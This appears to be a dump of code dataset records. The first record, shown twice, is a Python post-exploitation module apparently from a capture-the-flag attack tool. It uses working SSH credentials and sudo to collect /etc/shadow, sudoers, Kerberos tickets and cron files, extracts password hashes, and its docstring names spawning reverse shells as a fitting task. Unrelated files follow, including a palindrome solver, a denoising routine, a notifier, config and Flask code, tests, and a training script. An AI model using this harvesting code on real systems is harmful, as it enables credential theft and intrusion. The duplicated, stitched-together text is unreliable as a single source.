unknown plugin. 
""" # Unconfigure all plugins from a previous run list(map(PostPlugin.unconfigure, self.registry.values())) self.run_plugins = [] # Configure used plugins for for command in config: if len(command.keys()) != 1: raise ValueError('Each commands entry should have exactly one key') name = list(command.keys())[0] if name not in self.registry: raise KeyError('Unknown plugin: {}'.format(name)) plugin = self.registry[name] plugin.configure(command[name]) self.run_plugins.append(name) def post(self, service: Service, context: PostContext) -> bool: """ Runs applicable post pwn plugins against the given service, with the given context. :param service: The service to post pwn :param context: The context for the server :return: Whether all post invocation were successful """ results = [plugin.run(service, context) for plugin in self.registry.values() if plugin.name in self.run_plugins or plugin.predicate(service, context)] return all(results) class SSHFileExfil(PostPlugin): """ The ``ssh_exfil`` plugin attempt to find as many ``SENSITIVE_FILES`` as possible. This plugin takes some optional parameters: ``files``: List[str] A list of files to look for. All entries ending with a ``/`` are considered directories and will be searched. ``merge_files``: Boolean Set to ``True`` if you want to merge ``files`` with ``SENSITIVE_FILES``, otherwise only ``files`` will be searched. This plugin will run automatically for all services using port 22. 
""" name = 'ssh_exfil' schema = { Optional('files', default=[]): [str], Optional('merge_files', default=True): bool, } context_schema = { 'ssh': paramiko.SSHClient, 'credentials': object, } def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post ssh exfil') if not self.config: self.config = { 'files': [], 'merge_files': True, } credentials: Iterable[Credential] = context['credentials'] ssh: paramiko.SSHClient = context['ssh'] def _map_creds(bag): return bag.credentials.where(Credential.service == service).get() credentials = map(_map_creds, credentials) working_creds = filter(lambda c: c.state == Credential.WORKS, credentials) for credential in working_creds: ssh.connect(service.service_url, service.service_port, credential.bag.username, credential.bag.password) self._post(credential, ssh) def _post(self, credential: Credential, ssh: paramiko.SSHClient): sensitive_files: list = self.config['files'] if self.config['merge_files']: sensitive_files.extend(SENSITIVE_FILES) # Stage 0 - Determine access level # If we have sudo access, we need to tell the various exploit # functions so they can use it. 
sudo = credential.bag.password if credential.sudo else None # Stag 1 - Sensitive Files def _get_file_info(path: str) -> Tuple[str, str]: name_cmd = 'file -b {}'.format(path) mime_cmd = 'file -i -b {}'.format(path) if sudo: _, stdout, _ = run_sudo(ssh, name_cmd, sudo) name = stdout.read().decode('utf-8').strip() _, stdout, _ = run_sudo(ssh, mime_cmd, sudo) mime = stdout.read().decode('utf-8').strip() else: name = run_command(ssh, name_cmd) mime = run_command(ssh, mime_cmd) return name, mime queue = deque(sensitive_files) while len(queue): path = queue.pop() # Path is a directory if path[-1] == '/': directory = get_directory(ssh, path, sudo) if directory: queue.extend(map(lambda x: os.path.join(path, x.strip()), directory)) # Path is a wildcard elif '*' in path: files = expand_wildcard(ssh, path, sudo) if files: queue.extend(map(lambda x: x.strip(), files)) # Path shold be a file else: if File.select().where(File.service == credential.service, File.path == path).count() >= 1: continue info = _get_file_info(path) contents = get_file(ssh, path, sudo) if contents: File.create(path=path, contents=contents, mime_type=info[1], info=info[0], service=credential.service) else: logger.error('There was an error retrieving sensitive file %s: %s', path, contents) return False return True def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 class ShadowExtractor(PostPlugin): """ Extract hashes out of collected files. This plugin will run automatically for all services using port 22. 
""" name = 'shadow' schema = {} context_schema = {} depends_on = ['ssh_exfil'] def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post shadow extractor') files = File.select().where(File.service == service, File.path.endswith('/shadow')) for file in files: contents = file.contents.tobytes().decode('utf-8') [self._parse_shadow(line, file, service) for line in contents.split('\n')] @staticmethod def _parse_shadow(line: str, file: File, service: Service): (username, hash, *_) = line.split(':') if hash == '*' or hash == '!': logger.debug('skipping user without hash %s', username) return logger.info('Found valid hash for %s', username) ShadowEntry.create(source=file, service=service, username=username, hash=hash) def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 registry = PluginRegistry() registry.register(SSHFileExfil) registry.register(ShadowExtractor)
""" Tasks to do after checking/retrieving flags. These functions **MUST NOT** bubble exceptions. A post task failing does not mean the protocol has failed, just any of the fun stuff you want to do afterwards. Things that belong here: - grabbing fun (non-flag) files - spawning reverse shells Things that don't belong here: - grabbing flags """ import logging import os from abc import ABC, abstractmethod from collections import deque from typing import Tuple, Type, Dict, List, Iterable import paramiko from schema import Schema, Optional from flag_slurper.autolib import Service from .exploit import get_directory, get_file, run_command, run_sudo, expand_wildcard from .models import Credential, File, ShadowEntry logger = logging.getLogger(__name__) #: Sensitive files to find on systems. Paths #: ending in / are directories. SENSITIVE_FILES = [ # Authentication '/etc/passwd', '/etc/shadow', '/etc/sudoers', '/etc/sudoers.d/', # Kerberos '/tmp/krb*', '/etc/krb*', '/etc/sssd/', # Cron '/etc/crontab', '/etc/cron.d/', '/etc/cron.daily/', '/etc/cron.hourly/', '/etc/cron.monthly/', '/etc/cron.weekly/', # Shell configs and profiles '/etc/skel/', '/etc/**/.bashrc', '/etc/**/.bash_profile', '/etc/**/.zshrc', '/etc/**/.profile' ] class PostContext(dict): """ A wrapper method for passing post pwn methods arbitrary data. This allows pwn functions to pass whatever arbitrary data they need onto the post plugins in an extensible way. """ def validate(self, schema: dict) -> 'PostContext': """ Allow a plugin to enforce their own schema for their context data. The ``Schema`` object is created by the context, not the plugin. :param schema: A dictionary containing the schema :return: Returns the context for chaining """ Schema(schema, ignore_extra_keys=True).validate(self) return self class PostPlugin(ABC): """ Defines a post pwn plugin. Plugins are configured in the ``post`` key to a project. For example: .. code-block:: yaml --- _version: "0.1" ... 
post: - service: WWW SSH commands: - <post plugin name>: <arguments> """ name = None schema = None context_schema = None config = None depends_on = [] def configure(self, config: dict) -> dict: """ Configure the plugin. This provides the base configuration implementation. It simply just validates the schema against the given config. Plugins that need more involved configuration may override this method. Plugins must define their own schema by overriding the ``schema`` class variable. :param config: :return: """ if not self.schema: raise ValueError('The schema for {} has not been configured'.format(self.name)) config = Schema(self.schema).validate(config) self.config = config logger.info('Configuring plugin: %s', self.config) return config def unconfigure(self): """ Remove any previous configuration. This is used between post exploits. """ self.config = None @abstractmethod def run(self, service: Service, context: PostContext) -> bool: """ Run the post pwn plugin. This is where the plugin will perform any actions it needs. All run methods MUST call their super before accessing the given context, otherwise it must attempt to safely access context entries. :param service: The service we are currently attacking :param context: The context given to the post plugin :returns: True if successful, False otherwise :raises ValueError: if the context schema has not been set """ if self.context_schema is None: raise ValueError('The context_schema for {} has not been configured'.format(self.name)) context.validate(self.context_schema) return True @abstractmethod def predicate(self, service: Service, context: PostContext) -> bool: """ Determines whether the plugin should be run for the given service, context, and configuration. The plugin's configuration will have been validated at this point. 
:param service: The current service to test against :param context: The current post context :return: True if this plugin should run, False otherwise """ raise NotImplementedError class PluginRegistry: """ The post pwn plugin registry. This handles configuring and figuring out which plugins will need to be run. """ def __init__(self): self.registry: Dict[str, PostPlugin] = {} def register(self, plugin: Type[PostPlugin]): """ Register a plugin with the plugin registry. :param plugin: The plugin class to register. :raises ValueError: If the plugin does not subclass :py:class:`PostPlugin`. :raises ValueError: If the plugin name is already taken. """ if not issubclass(plugin, PostPlugin): raise ValueError('Plugins must extend PostPlugin') if plugin.name in self.registry: raise ValueError('Plugin already registered by this name: {}'.format(plugin.name)) self.registry[plugin.name] = plugin() # The plugins that will be used for the current run self.run_plugins = [] def configure(self, config: List[dict]): """ Configure the plugins that will be used for this run. This will accept the ``commands`` section for the current service. :param config: The post config for the current service. :raises KeyError: When a command is specified that doesn't exist. :raises ValueError: When more than one key in a command entry. :raises ValueError: When a command uses an unknown plugin. 
""" # Unconfigure all plugins from a previous run list(map(PostPlugin.unconfigure, self.registry.values())) self.run_plugins = [] # Configure used plugins for for command in config: if len(command.keys()) != 1: raise ValueError('Each commands entry should have exactly one key') name = list(command.keys())[0] if name not in self.registry: raise KeyError('Unknown plugin: {}'.format(name)) plugin = self.registry[name] plugin.configure(command[name]) self.run_plugins.append(name) def post(self, service: Service, context: PostContext) -> bool: """ Runs applicable post pwn plugins against the given service, with the given context. :param service: The service to post pwn :param context: The context for the server :return: Whether all post invocation were successful """ results = [plugin.run(service, context) for plugin in self.registry.values() if plugin.name in self.run_plugins or plugin.predicate(service, context)] return all(results) class SSHFileExfil(PostPlugin): """ The ``ssh_exfil`` plugin attempt to find as many ``SENSITIVE_FILES`` as possible. This plugin takes some optional parameters: ``files``: List[str] A list of files to look for. All entries ending with a ``/`` are considered directories and will be searched. ``merge_files``: Boolean Set to ``True`` if you want to merge ``files`` with ``SENSITIVE_FILES``, otherwise only ``files`` will be searched. This plugin will run automatically for all services using port 22. 
""" name = 'ssh_exfil' schema = { Optional('files', default=[]): [str], Optional('merge_files', default=True): bool, } context_schema = { 'ssh': paramiko.SSHClient, 'credentials': object, } def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post ssh exfil') if not self.config: self.config = { 'files': [], 'merge_files': True, } credentials: Iterable[Credential] = context['credentials'] ssh: paramiko.SSHClient = context['ssh'] def _map_creds(bag): return bag.credentials.where(Credential.service == service).get() credentials = map(_map_creds, credentials) working_creds = filter(lambda c: c.state == Credential.WORKS, credentials) for credential in working_creds: ssh.connect(service.service_url, service.service_port, credential.bag.username, credential.bag.password) self._post(credential, ssh) def _post(self, credential: Credential, ssh: paramiko.SSHClient): sensitive_files: list = self.config['files'] if self.config['merge_files']: sensitive_files.extend(SENSITIVE_FILES) # Stage 0 - Determine access level # If we have sudo access, we need to tell the various exploit # functions so they can use it. 
sudo = credential.bag.password if credential.sudo else None # Stag 1 - Sensitive Files def _get_file_info(path: str) -> Tuple[str, str]: name_cmd = 'file -b {}'.format(path) mime_cmd = 'file -i -b {}'.format(path) if sudo: _, stdout, _ = run_sudo(ssh, name_cmd, sudo) name = stdout.read().decode('utf-8').strip() _, stdout, _ = run_sudo(ssh, mime_cmd, sudo) mime = stdout.read().decode('utf-8').strip() else: name = run_command(ssh, name_cmd) mime = run_command(ssh, mime_cmd) return name, mime queue = deque(sensitive_files) while len(queue): path = queue.pop() # Path is a directory if path[-1] == '/': directory = get_directory(ssh, path, sudo) if directory: queue.extend(map(lambda x: os.path.join(path, x.strip()), directory)) # Path is a wildcard elif '*' in path: files = expand_wildcard(ssh, path, sudo) if files: queue.extend(map(lambda x: x.strip(), files)) # Path shold be a file else: if File.select().where(File.service == credential.service, File.path == path).count() >= 1: continue info = _get_file_info(path) contents = get_file(ssh, path, sudo) if contents: File.create(path=path, contents=contents, mime_type=info[1], info=info[0], service=credential.service) else: logger.error('There was an error retrieving sensitive file %s: %s', path, contents) return False return True def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 class ShadowExtractor(PostPlugin): """ Extract hashes out of collected files. This plugin will run automatically for all services using port 22. 
""" name = 'shadow' schema = {} context_schema = {} depends_on = ['ssh_exfil'] def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post shadow extractor') files = File.select().where(File.service == service, File.path.endswith('/shadow')) for file in files: contents = file.contents.tobytes().decode('utf-8') [self._parse_shadow(line, file, service) for line in contents.split('\n')] @staticmethod def _parse_shadow(line: str, file: File, service: Service): (username, hash, *_) = line.split(':') if hash == '*' or hash == '!': logger.debug('skipping user without hash %s', username) return logger.info('Found valid hash for %s', username) ShadowEntry.create(source=file, service=service, username=username, hash=hash) def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 registry = PluginRegistry() registry.register(SSHFileExfil) registry.register(ShadowExtractor)
en
0.819109
Tasks to do after checking/retrieving flags. These functions **MUST NOT** bubble exceptions. A post task failing does not mean the protocol has failed, just any of the fun stuff you want to do afterwards. Things that belong here: - grabbing fun (non-flag) files - spawning reverse shells Things that don't belong here: - grabbing flags #: Sensitive files to find on systems. Paths #: ending in / are directories. # Authentication # Kerberos # Cron # Shell configs and profiles A wrapper method for passing post pwn methods arbitrary data. This allows pwn functions to pass whatever arbitrary data they need onto the post plugins in an extensible way. Allow a plugin to enforce their own schema for their context data. The ``Schema`` object is created by the context, not the plugin. :param schema: A dictionary containing the schema :return: Returns the context for chaining Defines a post pwn plugin. Plugins are configured in the ``post`` key to a project. For example: .. code-block:: yaml --- _version: "0.1" ... post: - service: WWW SSH commands: - <post plugin name>: <arguments> Configure the plugin. This provides the base configuration implementation. It simply just validates the schema against the given config. Plugins that need more involved configuration may override this method. Plugins must define their own schema by overriding the ``schema`` class variable. :param config: :return: Remove any previous configuration. This is used between post exploits. Run the post pwn plugin. This is where the plugin will perform any actions it needs. All run methods MUST call their super before accessing the given context, otherwise it must attempt to safely access context entries. :param service: The service we are currently attacking :param context: The context given to the post plugin :returns: True if successful, False otherwise :raises ValueError: if the context schema has not been set Determines whether the plugin should be run for the given service, context, and configuration. 
The plugin's configuration will have been validated at this point. :param service: The current service to test against :param context: The current post context :return: True if this plugin should run, False otherwise The post pwn plugin registry. This handles configuring and figuring out which plugins will need to be run. Register a plugin with the plugin registry. :param plugin: The plugin class to register. :raises ValueError: If the plugin does not subclass :py:class:`PostPlugin`. :raises ValueError: If the plugin name is already taken. # The plugins that will be used for the current run Configure the plugins that will be used for this run. This will accept the ``commands`` section for the current service. :param config: The post config for the current service. :raises KeyError: When a command is specified that doesn't exist. :raises ValueError: When more than one key in a command entry. :raises ValueError: When a command uses an unknown plugin. # Unconfigure all plugins from a previous run # Configure used plugins for Runs applicable post pwn plugins against the given service, with the given context. :param service: The service to post pwn :param context: The context for the server :return: Whether all post invocation were successful The ``ssh_exfil`` plugin attempt to find as many ``SENSITIVE_FILES`` as possible. This plugin takes some optional parameters: ``files``: List[str] A list of files to look for. All entries ending with a ``/`` are considered directories and will be searched. ``merge_files``: Boolean Set to ``True`` if you want to merge ``files`` with ``SENSITIVE_FILES``, otherwise only ``files`` will be searched. This plugin will run automatically for all services using port 22. # Stage 0 - Determine access level # If we have sudo access, we need to tell the various exploit # functions so they can use it. # Stag 1 - Sensitive Files # Path is a directory # Path is a wildcard # Path shold be a file Extract hashes out of collected files. 
This plugin will run automatically for all services using port 22.
2.366428
2
python/680/680.py
yiGmMk/leetcode
0
6618608
<reponame>yiGmMk/leetcode class Solution: def validPalindrome(self, s: str) -> bool: def check(low,high): i,j=low,high while i<j: if s[i]!=s[j]: return False; i+=1 j-=1 return True low,high=0,len(s)-1 while low<high: if s[low]==s[high]: low+=1 high-=1 else: return check(low,high-1) or check(low+1,high) return True s=Solution() s.validPalindrome("abc")
class Solution:
    def validPalindrome(self, s: str) -> bool:
        """Return True if s is a palindrome after deleting at most one char."""

        def is_palindrome(lo: int, hi: int) -> bool:
            # Compare the segment s[lo:hi+1] against its reverse via slicing
            # instead of walking two pointers inward.
            segment = s[lo:hi + 1]
            return segment == segment[::-1]

        lo, hi = 0, len(s) - 1
        while lo < hi:
            if s[lo] != s[hi]:
                # First mismatch: we may delete exactly one character, so the
                # string is valid iff skipping either end yields a palindrome.
                return is_palindrome(lo, hi - 1) or is_palindrome(lo + 1, hi)
            lo += 1
            hi -= 1
        return True


s = Solution()
s.validPalindrome("abc")
none
1
3.500323
4
TVD/mctv1d.py
Kevin-McIsaac/1D-MCTV-Denoising
2
6618609
<reponame>Kevin-McIsaac/1D-MCTV-Denoising<filename>TVD/mctv1d.py<gh_stars>1-10 # -*- coding: utf-8 -*- """ Created on Sat Jul 14 16:26:18 2018 @author: <NAME> Paper: <NAME>. & <NAME>.: Minmax-concave Total Variation Denoising. Signal, Image and Video Processing (2018). doi: 10.1007/s11760-018-1248-2 Algorithm for arg_min_X 0.5|Y - X|_2^2 + lamda*|X|_MCTV """ import tv1d import numpy as np def denoising_1D_MCTV(Y, para): K, N = 0, len(Y) X = np.zeros(N) U = np.ones(N) lamda, alpha = para.regularization, para.nonconvexity num, err = para.most_iter_num, para.convergence while K <= num and np.linalg.norm(U - X) > err: C = Dxt(Dx(X)) - Dxt(shrink(Dx(X), 1 / alpha)) Z = Y + lamda * alpha * C U = X X = tv1d.denoising_1D_TV(Z, lamda) K += 1 return X def shrink(Y, lamda): return np.fmax(np.fabs(Y) - lamda, 0) * np.sign(Y) def Dx(Y): return np.ediff1d(Y, to_begin = Y[0] - Y[-1]) def Dxt(Y): X = np.ediff1d(Y[::-1])[::-1] return np.append(X, Y[-1] - Y[0])
# -*- coding: utf-8 -*- """ Created on Sat Jul 14 16:26:18 2018 @author: <NAME> Paper: <NAME>. & <NAME>.: Minmax-concave Total Variation Denoising. Signal, Image and Video Processing (2018). doi: 10.1007/s11760-018-1248-2 Algorithm for arg_min_X 0.5|Y - X|_2^2 + lamda*|X|_MCTV """ import tv1d import numpy as np def denoising_1D_MCTV(Y, para): K, N = 0, len(Y) X = np.zeros(N) U = np.ones(N) lamda, alpha = para.regularization, para.nonconvexity num, err = para.most_iter_num, para.convergence while K <= num and np.linalg.norm(U - X) > err: C = Dxt(Dx(X)) - Dxt(shrink(Dx(X), 1 / alpha)) Z = Y + lamda * alpha * C U = X X = tv1d.denoising_1D_TV(Z, lamda) K += 1 return X def shrink(Y, lamda): return np.fmax(np.fabs(Y) - lamda, 0) * np.sign(Y) def Dx(Y): return np.ediff1d(Y, to_begin = Y[0] - Y[-1]) def Dxt(Y): X = np.ediff1d(Y[::-1])[::-1] return np.append(X, Y[-1] - Y[0])
en
0.507922
# -*- coding: utf-8 -*- Created on Sat Jul 14 16:26:18 2018 @author: <NAME> Paper: <NAME>. & <NAME>.: Minmax-concave Total Variation Denoising. Signal, Image and Video Processing (2018). doi: 10.1007/s11760-018-1248-2 Algorithm for arg_min_X 0.5|Y - X|_2^2 + lamda*|X|_MCTV
2.403594
2
line/notify.py
Katsuya-Ishiyama/hoikuen-jisan
0
6618610
<filename>line/notify.py import requests from utils import load_settings LINE_NOTIFY_API = "https://notify-api.line.me/api/notify" class LineNotifier(object): def __init__(self, test=False): self.settings = load_settings("settings.yml")["line"] self.environment = "test" if test else "production" def send(self, message: str): token = self.settings["token"][self.environment] headers = {'Authorization': f'Bearer {token}'} data = {'message': message} requests.post(LINE_NOTIFY_API, headers=headers, data=data)
import requests

from utils import load_settings

LINE_NOTIFY_API = "https://notify-api.line.me/api/notify"

# Seconds to wait for the LINE API before giving up; without an explicit
# timeout, requests.post can block the caller indefinitely.
REQUEST_TIMEOUT = 10


class LineNotifier(object):
    """Send push messages through the LINE Notify API.

    The API token is read from the ``line`` section of ``settings.yml``;
    ``test=True`` selects the token stored under ``test`` instead of
    ``production``.
    """

    def __init__(self, test=False):
        # NOTE(review): assumes settings.yml provides
        # line.token.{test,production} -- verify against utils.load_settings.
        self.settings = load_settings("settings.yml")["line"]
        self.environment = "test" if test else "production"

    def send(self, message: str):
        """POST *message* to the LINE Notify endpoint.

        Network errors (including the timeout) propagate to the caller.
        """
        token = self.settings["token"][self.environment]
        headers = {'Authorization': f'Bearer {token}'}
        data = {'message': message}
        # Bound the request so a stalled connection cannot hang the process.
        requests.post(LINE_NOTIFY_API, headers=headers, data=data,
                      timeout=REQUEST_TIMEOUT)
none
1
2.356021
2
nuclear/config.py
afloers/nuclear
0
6618611
import logging
import os
import shutil

import yaml

from astropy.config import get_config_dir

from nuclear import __path__ as NUCLEAR_PATH

NUCLEAR_PATH = NUCLEAR_PATH[0]
DEFAULT_CONFIG_PATH = os.path.join(NUCLEAR_PATH, 'default_tardisnuclear_config.yml')
DEFAULT_DATA_DIR = os.path.join(os.path.expanduser('~'), 'Downloads',
                                'tardisnuclear')

logger = logging.getLogger(__name__)


def get_configuration():
    """Load the tardisnuclear configuration as a dict.

    If the user-level config file does not exist yet, it is first copied
    from ``DEFAULT_CONFIG_PATH``.
    """
    config_fpath = os.path.join(get_config_dir(), 'tardisnuclear_config.yml')
    if not os.path.exists(config_fpath):
        logger.warning(f"Configuration File {config_fpath} does not exist - "
                       f"creating new one from default")
        shutil.copy(DEFAULT_CONFIG_PATH, config_fpath)
    # Context manager closes the handle deterministically (the previous
    # yaml.load(open(...)) leaked the file object).
    with open(config_fpath) as config_fh:
        return yaml.load(config_fh, Loader=yaml.FullLoader)


def get_data_dir():
    """Return the directory used to store downloaded nuclear data.

    Falls back to ``DEFAULT_DATA_DIR`` (creating it and recording it in the
    config file) when ``data_dir`` is not configured.

    Raises
    ------
    IOError
        If the configured data directory does not exist.
    """
    config = get_configuration()
    data_dir = config.get('data_dir', None)
    if data_dir is None:
        config_fpath = os.path.join(get_config_dir(),
                                    'tardisnuclear_config.yml')
        # Use the module-level logger (not the root logger) so the message is
        # attributed to this module and honours its handler configuration.
        logger.critical(
            '\n{line_stars}\n\nTARDISNUCLEAR will download nuclear data to its data directory {default_data_dir}\n\n'
            'TARDISNUCLEAR DATA DIRECTORY not specified in {config_file}:\n\n'
            'ASSUMING DEFAULT DATA DIRECTORY {default_data_dir}\n '
            'YOU CAN CHANGE THIS AT ANY TIME IN {config_file} \n\n'
            '{line_stars} \n\n'.format(line_stars='*' * 80,
                                       config_file=config_fpath,
                                       default_data_dir=DEFAULT_DATA_DIR))
        if not os.path.exists(DEFAULT_DATA_DIR):
            os.makedirs(DEFAULT_DATA_DIR)
        config['data_dir'] = DEFAULT_DATA_DIR
        # Persist the chosen directory; the context manager guarantees the
        # file is flushed and closed even if yaml.dump raises.
        with open(config_fpath, 'w') as config_fh:
            yaml.dump(config, config_fh, default_flow_style=False)
        data_dir = DEFAULT_DATA_DIR

    if not os.path.exists(data_dir):
        raise IOError(f'Data directory specified in {data_dir} does not exist')

    logger.info(f"Using TARDISNuclear Data directory {data_dir}")
    return data_dir
import logging
import os
import shutil

import yaml

from astropy.config import get_config_dir

from nuclear import __path__ as NUCLEAR_PATH

NUCLEAR_PATH = NUCLEAR_PATH[0]
DEFAULT_CONFIG_PATH = os.path.join(NUCLEAR_PATH, 'default_tardisnuclear_config.yml')
DEFAULT_DATA_DIR = os.path.join(os.path.expanduser('~'), 'Downloads',
                                'tardisnuclear')

logger = logging.getLogger(__name__)


def get_configuration():
    """Load the tardisnuclear configuration as a dict.

    If the user-level config file does not exist yet, it is first copied
    from ``DEFAULT_CONFIG_PATH``.
    """
    config_fpath = os.path.join(get_config_dir(), 'tardisnuclear_config.yml')
    if not os.path.exists(config_fpath):
        logger.warning(f"Configuration File {config_fpath} does not exist - "
                       f"creating new one from default")
        shutil.copy(DEFAULT_CONFIG_PATH, config_fpath)
    # Context manager closes the handle deterministically (the previous
    # yaml.load(open(...)) leaked the file object).
    with open(config_fpath) as config_fh:
        return yaml.load(config_fh, Loader=yaml.FullLoader)


def get_data_dir():
    """Return the directory used to store downloaded nuclear data.

    Falls back to ``DEFAULT_DATA_DIR`` (creating it and recording it in the
    config file) when ``data_dir`` is not configured.

    Raises
    ------
    IOError
        If the configured data directory does not exist.
    """
    config = get_configuration()
    data_dir = config.get('data_dir', None)
    if data_dir is None:
        config_fpath = os.path.join(get_config_dir(),
                                    'tardisnuclear_config.yml')
        # Use the module-level logger (not the root logger) so the message is
        # attributed to this module and honours its handler configuration.
        logger.critical(
            '\n{line_stars}\n\nTARDISNUCLEAR will download nuclear data to its data directory {default_data_dir}\n\n'
            'TARDISNUCLEAR DATA DIRECTORY not specified in {config_file}:\n\n'
            'ASSUMING DEFAULT DATA DIRECTORY {default_data_dir}\n '
            'YOU CAN CHANGE THIS AT ANY TIME IN {config_file} \n\n'
            '{line_stars} \n\n'.format(line_stars='*' * 80,
                                       config_file=config_fpath,
                                       default_data_dir=DEFAULT_DATA_DIR))
        if not os.path.exists(DEFAULT_DATA_DIR):
            os.makedirs(DEFAULT_DATA_DIR)
        config['data_dir'] = DEFAULT_DATA_DIR
        # Persist the chosen directory; the context manager guarantees the
        # file is flushed and closed even if yaml.dump raises.
        with open(config_fpath, 'w') as config_fh:
            yaml.dump(config, config_fh, default_flow_style=False)
        data_dir = DEFAULT_DATA_DIR

    if not os.path.exists(data_dir):
        raise IOError(f'Data directory specified in {data_dir} does not exist')

    logger.info(f"Using TARDISNuclear Data directory {data_dir}")
    return data_dir
none
1
2.482386
2
sprint-challenge/web_app/app.py
FuriouStyles/DS-Unit-3-Sprint-3-Productization-and-Cloud
0
6618612
<reponame>FuriouStyles/DS-Unit-3-Sprint-3-Productization-and-Cloud import os from dotenv import load_dotenv from flask import Flask, jsonify, request, render_template from flask_migrate import Migrate load_dotenv() DATABASE_URL = os.getenv("DATABASE_URL") # Initialize the webapp with persistent services def create_app(): app = Flask(__name__) app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URL app.config["SQLALCHEMY_DATABASE_TRACKING"] = False db.init_app(app) migrate.init_app(app, db) return app
import os

from dotenv import load_dotenv
from flask import Flask, jsonify, request, render_template
from flask_migrate import Migrate

load_dotenv()
DATABASE_URL = os.getenv("DATABASE_URL")

# Flask-Migrate extension instance; bound to the app inside create_app().
migrate = Migrate()

# NOTE(review): `db` (the flask_sqlalchemy SQLAlchemy() instance) is never
# defined in this file - it must be imported from the module that declares
# the models, otherwise create_app() raises NameError.  TODO: confirm where
# `db` lives and import it here.


# Initialize the webapp with persistent services
def create_app():
    """Application factory: build and configure the Flask app.

    Returns a Flask instance with the database and migration extensions
    initialised against DATABASE_URL from the environment.
    """
    app = Flask(__name__)
    app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URL
    # BUG FIX: the recognised Flask-SQLAlchemy setting is
    # SQLALCHEMY_TRACK_MODIFICATIONS; the previous key
    # ("SQLALCHEMY_DATABASE_TRACKING") is not a real setting, so the
    # modification-tracking overhead it was meant to disable stayed enabled.
    app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
    db.init_app(app)
    migrate.init_app(app, db)
    return app
en
0.855886
# Initialize the webapp with persistent services
2.344152
2
challenge/acme_test.py
jonathanmendoza-tx/DS-Unit-3-Sprint-1-Software-Engineering
0
6618613
import unittest

from acme import Product
from acme_report import generate_products, ADJECTIVES, NOUNS


class AcmeProductTests(unittest.TestCase):
    """ Making sure Acme products are the tops! """

    def test_default_product_price(self):
        """ Test default product price being 10. """
        prod = Product('Test Product')
        self.assertEqual(prod.price, 10)

    def test_default_product_weight(self):
        """ Test default product weight being 20. """
        prod = Product('Test Product')
        self.assertEqual(prod.weight, 20)

    def test_stealability_explode(self):
        """ Test stealability and explode function with other than default
        values """
        prod = Product('Test Product')
        prod.weight = 100
        prod.price = 1000
        self.assertEqual(Product.stealability(prod), 'Very stealable!')
        self.assertEqual(Product.explode(prod), '...BABOOM!!')


class AcmeReportTests(unittest.TestCase):

    def test_default_num_products(self):
        """ Test that products really does receive a list of default length 30
        """
        products = generate_products()
        self.assertEqual(len(products), 30)

    def test_legal_names(self):
        """ checks that the generated names for a default batch of products
        are all valid possible names to generate (adjective, space, noun,
        from the lists of possible words) """
        products = generate_products()
        # Collect the adjective (first word) and noun (second word) of every
        # generated "<adjective> <noun>" product name.
        check_for_adjs = []
        check_for_nouns = []
        for product in products:
            name = str(product).split()
            check_for_adjs.append(name[0])
            check_for_nouns.append(name[1])
        # BUG FIX: the original appended to `check_for_nouns` while having
        # declared only `check_for_noun`, so this test raised NameError.
        # Iterating the sets directly also replaces the old
        # range(len(set(...))) index gymnastics.
        for adjective in set(check_for_adjs):
            self.assertIn(adjective, ADJECTIVES)
        for noun in set(check_for_nouns):
            self.assertIn(noun, NOUNS)


if __name__ == '__main__':
    unittest.main()
import unittest

from acme import Product
from acme_report import generate_products, ADJECTIVES, NOUNS


class AcmeProductTests(unittest.TestCase):
    """ Making sure Acme products are the tops! """

    def test_default_product_price(self):
        """ Test default product price being 10. """
        prod = Product('Test Product')
        self.assertEqual(prod.price, 10)

    def test_default_product_weight(self):
        """ Test default product weight being 20. """
        prod = Product('Test Product')
        self.assertEqual(prod.weight, 20)

    def test_stealability_explode(self):
        """ Test stealability and explode function with other than default
        values """
        prod = Product('Test Product')
        prod.weight = 100
        prod.price = 1000
        self.assertEqual(Product.stealability(prod), 'Very stealable!')
        self.assertEqual(Product.explode(prod), '...BABOOM!!')


class AcmeReportTests(unittest.TestCase):

    def test_default_num_products(self):
        """ Test that products really does receive a list of default length 30
        """
        products = generate_products()
        self.assertEqual(len(products), 30)

    def test_legal_names(self):
        """ checks that the generated names for a default batch of products
        are all valid possible names to generate (adjective, space, noun,
        from the lists of possible words) """
        products = generate_products()
        # Collect the adjective (first word) and noun (second word) of every
        # generated "<adjective> <noun>" product name.
        check_for_adjs = []
        check_for_nouns = []
        for product in products:
            name = str(product).split()
            check_for_adjs.append(name[0])
            check_for_nouns.append(name[1])
        # BUG FIX: the original appended to `check_for_nouns` while having
        # declared only `check_for_noun`, so this test raised NameError.
        # Iterating the sets directly also replaces the old
        # range(len(set(...))) index gymnastics.
        for adjective in set(check_for_adjs):
            self.assertIn(adjective, ADJECTIVES)
        for noun in set(check_for_nouns):
            self.assertIn(noun, NOUNS)


if __name__ == '__main__':
    unittest.main()
en
0.846179
Making sure Acme products are the tops! Test default product price being 10. Test default product weight being 20. Test stealability and explode function with other than default values Test that products really does receive a list of default length 30 checks that the generated names for a default batch of products are all valid possible names to generate (adjective, space, noun, from the lists of possible words) Split and collect the first and second words of each product in a list. Check if the first names match to adjectives and the second to nouns
3.637197
4
src/main.py
YugeTen/fish
71
6618614
<reponame>YugeTen/fish<gh_stars>10-100
import copy
import argparse
import datetime
import json
import os
import sys
import csv
import tqdm
from collections import defaultdict
from tempfile import mkdtemp

import numpy as np
import torch
import torch.optim as optim

import models
from config import dataset_defaults
from utils import unpack_data, sample_domains, save_best_model, \
    Logger, return_predict_fn, return_criterion, fish_step

runId = datetime.datetime.now().isoformat().replace(':', '_')
torch.backends.cudnn.benchmark = True

parser = argparse.ArgumentParser(description='Gradient Matching for Domain Generalization.')
# General
parser.add_argument('--dataset', type=str,
                    help="Name of dataset, choose from amazon, camelyon, "
                         "cdsprites, civil, fmow, iwildcam, poverty")
parser.add_argument('--algorithm', type=str,
                    help='training scheme, choose between fish or erm.')
parser.add_argument('--experiment', type=str, default='.',
                    help='experiment name, set as . for automatic naming.')
